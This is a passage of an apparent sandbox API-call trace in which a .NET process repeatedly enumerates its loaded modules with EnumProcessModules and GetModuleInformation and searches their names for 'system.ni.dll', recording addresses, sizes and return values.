lpmodinfo=0x18f424*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.813] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.813] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.813] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.813] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.814] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.814] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.814] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.815] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.815] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.815] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.816] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.816] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.817] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.817] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.817] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.818] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.818] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.819] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.819] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.820] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.820] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.821] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.821] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.822] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0216.823] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18f424, cb=0xc | out: lpmodinfo=0x18f424*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0216.823] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18f21c, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0216.824] StrStrIW (lpFirst="api-ms-win-core-quirks-l1-1-0.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.828] GetCurrentProcess () returned 0xffffffff [0216.828] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18ddc4, cb=0x1000, lpcbNeeded=0x18efd8 | out: lphModule=0x18ddc4, lpcbNeeded=0x18efd8) returned 1 [0216.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.829] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.830] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.831] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.831] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.831] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.831] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.832] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.832] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.832] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.833] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.833] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.833] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.834] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.834] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.834] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.835] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.835] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.836] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.836] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.837] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.837] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.838] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.838] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.839] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.840] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.840] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0216.841] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18efcc, cb=0xc | out: lpmodinfo=0x18efcc*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0216.841] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18edc4, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0216.842] StrStrIW (lpFirst="api-ms-win-appmodel-runtime-l1-1-0.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.851] GetCurrentProcess () returned 0xffffffff [0216.851] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18d7f0, cb=0x1000, lpcbNeeded=0x18ea04 | out: lphModule=0x18d7f0, lpcbNeeded=0x18ea04) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.852] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.853] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.853] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.853] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.853] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.853] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.854] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.854] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76890000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76890000, SizeOfImage=0x100000, EntryPoint=0x768ab6ed)) returned 1 [0216.854] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76aa0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76aa0000, SizeOfImage=0xa000, EntryPoint=0x76aa36a0)) returned 1 [0216.855] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x772c0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x772c0000, SizeOfImage=0x9d000, EntryPoint=0x772f3fd7)) returned 1 [0216.855] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x775e0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x775e0000, SizeOfImage=0x60000, EntryPoint=0x775f158f)) returned 1 [0216.855] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77640000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x77640000, SizeOfImage=0xcc000, EntryPoint=0x7764168b)) returned 1 [0216.856] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755f0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x755f0000, SizeOfImage=0x4a000, EntryPoint=0x755f2e54)) returned 1 [0216.856] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x754c0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x754c0000, SizeOfImage=0x5f000, EntryPoint=0x754c2134)) returned 1 [0216.856] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75650000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75650000, SizeOfImage=0x5000, EntryPoint=0x756511d0)) returned 1 [0216.857] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75ba0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75ba0000, SizeOfImage=0xc4a000, EntryPoint=0x75c21601)) returned 1 [0216.857] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755d0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x755d0000, SizeOfImage=0x1c000, EntryPoint=0x755da431)) returned 1 [0216.858] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ab0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76ab0000, SizeOfImage=0x6000, EntryPoint=0x76ab1782)) returned 1 [0216.858] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x755c0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x755c0000, SizeOfImage=0x7000, EntryPoint=0x755c128d)) returned 1 [0216.859] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75330000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75330000, SizeOfImage=0x190000, EntryPoint=0x753cd026)) returned 1 [0216.859] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f80000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x76f80000, SizeOfImage=0x15c000, EntryPoint=0x76fcba3d)) returned 1 [0216.860] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75250000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75250000, SizeOfImage=0xd4000, EntryPoint=0x752830d2)) returned 1 [0216.860] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75150000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75150000, SizeOfImage=0xf5000, EntryPoint=0x751a4160)) returned 1 [0216.861] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75010000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75010000, SizeOfImage=0x13b000, EntryPoint=0x750ecc89)) returned 1 [0216.861] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75000000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75000000, SizeOfImage=0xd000, EntryPoint=0x750013e4)) returned 1 [0216.862] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74fa0000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74fa0000, SizeOfImage=0x5f000, EntryPoint=0x0)) returned 1 [0216.862] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74f10000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74f10000, SizeOfImage=0x78000, EntryPoint=0x74f1f7ba)) returned 1 [0216.863] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75640000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x75640000, SizeOfImage=0x9000, EntryPoint=0x75641220)) returned 1 [0216.863] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x74860000, lpmodinfo=0x18e9f8, cb=0xc | out: lpmodinfo=0x18e9f8*(lpBaseOfDll=0x74860000, SizeOfImage=0x6a8000, EntryPoint=0x749a7040)) returned 1 [0216.864] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x74860000, lpBaseName=0x18e7f0, nSize=0x104 | out: lpBaseName="clr.dll") returned 0x7 [0216.865] StrStrIW (lpFirst="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll", lpSrch="\\system.ni.dll") returned 0x0 [0216.912] GetCurrentProcess () returned 0xffffffff [0216.912] EnumProcessModules (in: hProcess=0xffffffff, lphModule=0x18da28, cb=0x1000, lpcbNeeded=0x18ec3c | out: lphModule=0x18da28, lpcbNeeded=0x18ec3c) returned 1 [0216.912] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x400000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x400000, SizeOfImage=0x142000, EntryPoint=0x540c00)) returned 1 [0216.912] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77c10000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x77c10000, SizeOfImage=0x180000, EntryPoint=0x0)) returned 1 [0216.912] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76990000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76990000, SizeOfImage=0x110000, EntryPoint=0x769a32d3)) returned 1 [0216.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x759d0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x759d0000, SizeOfImage=0x46000, EntryPoint=0x759d7478)) returned 1 [0216.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x767f0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x767f0000, SizeOfImage=0xa0000, EntryPoint=0x768049e5)) returned 1 [0216.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77170000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x77170000, SizeOfImage=0xac000, EntryPoint=0x7717a472)) returned 1 [0216.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x77590000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x77590000, SizeOfImage=0x19000, EntryPoint=0x77594975)) returned 1 [0216.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76ac0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76ac0000, SizeOfImage=0xf0000, EntryPoint=0x76ad0569)) returned 1 [0216.913] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75770000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75770000, SizeOfImage=0x60000, EntryPoint=0x7578a3b3)) returned 1 [0216.914] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x75760000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x75760000, SizeOfImage=0xc000, EntryPoint=0x757610e1)) returned 1 [0216.914] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76f70000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76f70000, SizeOfImage=0x5000, EntryPoint=0x76f71438)) returned 1 [0216.914] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x770e0000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x770e0000, SizeOfImage=0x57000, EntryPoint=0x770f9ba6)) returned 1 [0216.914] GetModuleInformation (in: hProcess=0xffffffff, hModule=0x76e50000, lpmodinfo=0x18ec30, cb=0xc | out: lpmodinfo=0x18ec30*(lpBaseOfDll=0x76e50000, SizeOfImage=0x90000, EntryPoint=0x76e66343)) returned 1 [0216.915] 